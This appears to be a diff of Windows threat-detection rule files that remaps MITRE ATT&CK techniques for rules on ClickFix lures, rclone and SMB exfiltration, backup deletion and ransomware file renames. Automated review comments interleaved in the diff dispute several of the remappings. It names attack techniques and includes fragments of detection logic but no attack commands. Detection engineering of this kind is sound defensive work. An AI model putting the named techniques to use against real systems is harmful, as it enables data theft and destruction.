+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+ "Data Source: Sysmon",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -93,18 +106,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 7297fbfd210..9d8c461049c 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] 
@@ -62,7 +62,19 @@ The Windows Command Shell (cmd.exe) is a critical component for executing comman risk_score = 73 rule_id = "d9ffc3d6-9de9-4b29-9395-5757d0695ecf" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -149,36 +161,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index da0f6bf4dc8..f2fdff5ae2b 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/19" [rule] author = ["Elastic"] @@ -57,7 +57,19 @@ note = """## Triage and analysis risk_score = 73 rule_id = "fbad57ec-4442-48db-a34f-5ee907b44a22" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -72,51 +84,61 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.004" 
-name = "Malicious Copy and Paste" -reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index ea6bea70489..499cedf6295 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/20" [rule] author = ["Elastic"] @@ -53,7 +53,20 @@ references = ["https://mrd0x.com/filefix-clickfix-alternative/"] risk_score = 73 rule_id = "7dc45430-7407-4790-b89e-c857c3f6bf23" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
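Review bot: The new Initial Access entry replaces User Execution (`T1204.004` Malicious Copy and Paste) with `T1566.001` Spearphishing Attachment, yet this file is named for the FakeCAPTCHA copy-and-paste lure and Spearphishing Attachment arguably does not describe a browser-rendered clipboard prompt; `T1566.002` Spearphishing Link (used elsewhere in this series) looks like the closer fit, and the T1204 entry the old side kept under the TA0002 Execution tactic could be retained there rather than dropped. The same substitution is made in execution_windows_phish_clickfix.toml. The new side of this file also ends without a trailing newline (`\ No newline at end of file`), unlike the other rule files in the series; add the final newline after the TA0001 `reference` line.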
@@ -70,23 +83,61 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.004" -name = "Malicious Copy and Paste" -reference = "https://attack.mitre.org/techniques/T1204/004/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index 1678f421920..ff0cfea3021 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ PowerShell is a powerful scripting language and command-line shell used for task risk_score = 47 rule_id = "83bf249e-4348-47ba-9741-1202a09556ad" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -173,31 +186,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index 2f9e2dc686d..b0f8b6c40d2 100644 --- a/rules/windows/execution_windows_script_from_internet.toml +++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -20,7 +20,14 @@ name = "Execution of a Downloaded Windows Script" risk_score = 47 rule_id = "79543b00-28a5-4461-81ac-644c4dc4012f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" 
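Review bot: The reformatted `tags` array in execution_windows_script_from_internet.toml omits the trailing comma after `"Resources: Investigation Guide"`, unlike every other multi-line tags array in this series, which ends with `"…",` before `]`; impact_high_freq_file_renames_by_kernel.toml has the same omission after `"Data Source: Elastic Defend"`. Add the trailing comma so future tag additions stay single-line diffs and the files are formatted consistently.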
@@ -78,29 +85,6 @@ Windows scripts, often used for legitimate automation tasks, can be exploited by - Implement application whitelisting to restrict the execution of unauthorized scripts and scripting utilities, reducing the risk of similar threats in the future.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" @@ -109,16 +93,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" 
@@ -129,7 +103,37 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 0623bb45aa5..48377c25e27 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -84,17 +84,11 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" 
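Review bot: Removing `T1567` Exfiltration Over Web Service from exfiltration_rclone_cloud_upload.toml leaves only `T1048` Exfiltration Over Alternative Protocol, which arguably misdescribes rclone pushing data to a cloud/web-service backend, the activity the file name points at; unless the query was narrowed to non-HTTP remotes, keep the block `id = "T1567"` / `name = "Exfiltration Over Web Service"` / `reference = "https://attack.mitre.org/techniques/T1567/"` alongside T1048. The query itself is outside this hunk, so the mapping cannot be confirmed from here, and the tags hunk for this file is not in this chunk either.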
diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 4c2598205f8..1e007cf4c87 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -61,7 +61,18 @@ references = ["https://www.securify.nl/en/blog/living-off-the-land-stealing-netn risk_score = 47 rule_id = "f580bf0a-2d23-43bb-b8e1-17548bb947ec" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -106,16 +117,17 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml index 18ea2498d68..445c8897378 100644 --- a/rules/windows/impact_backup_file_deletion.toml +++ b/rules/windows/impact_backup_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] @@ -107,13 +107,19 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml index 680f7b7dad8..8c1e77cc3b5 100644 --- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml +++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml 
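Review bot: Re-mapping exfiltration_smb_rare_destination.toml from `T1187` Forced Authentication / Credential Access to `T1048` / Exfiltration changes what the alert asserts, but the surviving reference (a NetNTLM-stealing write-up, visible in the tags hunk header) and presumably the description and investigation note still frame the activity as credential theft; update those in the same change, or keep Credential Access as a second `[[rule.threat]]` block rather than replacing it. The query (`event.category:network … process.pid:4`) is unchanged, so nothing on the new side explains why a rare outbound SMB connection from the kernel is now classified as exfiltration instead of forced authentication.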
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/09" [rule] author = ["Elastic"] @@ -93,13 +93,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index ef82bc6c119..e2d3edbbce1 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 47 rule_id = "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" +] timestamp_override = "event.ingested" type = "esql" 
@@ -79,25 +86,22 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" @@ -107,3 +111,5 @@ reference = "https://attack.mitre.org/techniques/T1021/002/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + + diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 96426b8ec98..7aa911b6309 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] 
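Review bot: Swapping `T1486` Data Encrypted for Impact for `T1485` Data Destruction in impact_high_freq_file_renames_by_kernel.toml drops the technique a ransomware-rename detection most directly evidences, given that the rule's own reference is an Akira ransomware write-up. The same swap is made in impact_ransomware_file_rename_smb.toml and impact_ransomware_note_file_over_smb.toml, there together with a new `T1490` Inhibit System Recovery entry that a rename/note-drop rule does not appear to observe, and impact_mod_critical_os_files.toml replaces `T1565` Data Manipulation with `T1490` on a file-modification rule. If the intent is to broaden the mapping, add T1485 beside the existing T1486 block rather than replacing it; if it is to narrow it, the commit message should say why encryption is no longer the mapped outcome.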
@@ -55,7 +55,20 @@ This rule identifies attempts to delete or modify critical files used during the risk_score = 73 rule_id = "1a3f2a4c-12d0-4b88-961a-2711ee295637" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -80,23 +93,18 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7134610ebc1..7f585c29ae5 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 73 rule_id = "78e9b5d5-7c07-40a7-a591-3dbbf464c386" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +82,36 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index e37debd4886..392a87fdba2 100644 
